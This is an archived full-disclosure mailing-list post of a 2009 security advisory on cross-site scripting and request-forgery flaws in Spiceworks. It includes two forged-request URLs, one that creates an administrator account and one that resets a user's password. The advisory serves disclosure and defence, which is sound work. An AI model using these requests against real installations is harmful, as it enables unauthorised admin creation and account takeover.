[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[NGENUITY] - Spiceworks Multiple Vulnerabilities (XSS & CSRF)
- To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [NGENUITY] - Spiceworks Multiple Vulnerabilities (XSS & CSRF)
- From: Adam Baldwin <adam_baldwin@xxxxxxxxxxxxxxx>
- Date: Sat, 08 Aug 2009 12:16:21 -0700
nGenuity Information Services - Security Advisory
Advisory ID: NGENUITY-2009-009 - Spiceworks Multiple Vulnerabilities
(XSS & CSRF)
Application: Spiceworks 3.6.31847
Vendor: Spiceworks
Vendor website: http://www.spiceworks.com
Author: Adam Baldwin (adam_baldwin@xxxxxxxxxxxxxxx)
Class: XSS, CSRF
I. BACKGROUND
Spiceworks is a network management, monitoring, helpdesk, etc
application that
uses a web based front end.
II. DETAILS
Multiple vulnerabilities exist within the Spiceworks platform that
can be used
to take over or otherwise abuse the application / infrastructure.
These vulnerabilities allow for the following attack scenarios to
be executed.
1. Creation of a new Administrator account
2. Password reset of users
Exploit Examples:
Create Administrator Account:
http://example.com/settings/users/create?user%5Bfirst_name%5D=Joe&user%5Bla
st_name%5D=Nobody&user%5Bemail%5D=user%40example.com&user%5Brole%5D=admin&us
er%5Bpassword%5D=PASSWORD&user%5Bpassword_confirmation%5D=PASSWORD
User Password Reset:
http://example.com/settings/users/change_password/1?user%5Bpassword%5D=PASSWORD
&editorId=password_entry_for_1
III. REFERENCES
[1] - http://www.spiceworks.com
[2] - http://cwe.mitre.org/data/definitions/79.html
[3] - http://cwe.mitre.org/data/definitions/352.html
IV. VENDOR COMMUNICATION
4.1.2009 - Vulnerability Discovery & Vendor Notification
4.6.2009 - Second attempt to contact vendor
4.7.2009 - Initial vendor response
8.8.2009 - Advisory Release
Copyright (c) 2009 nGenuity Information Services, LLC
http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/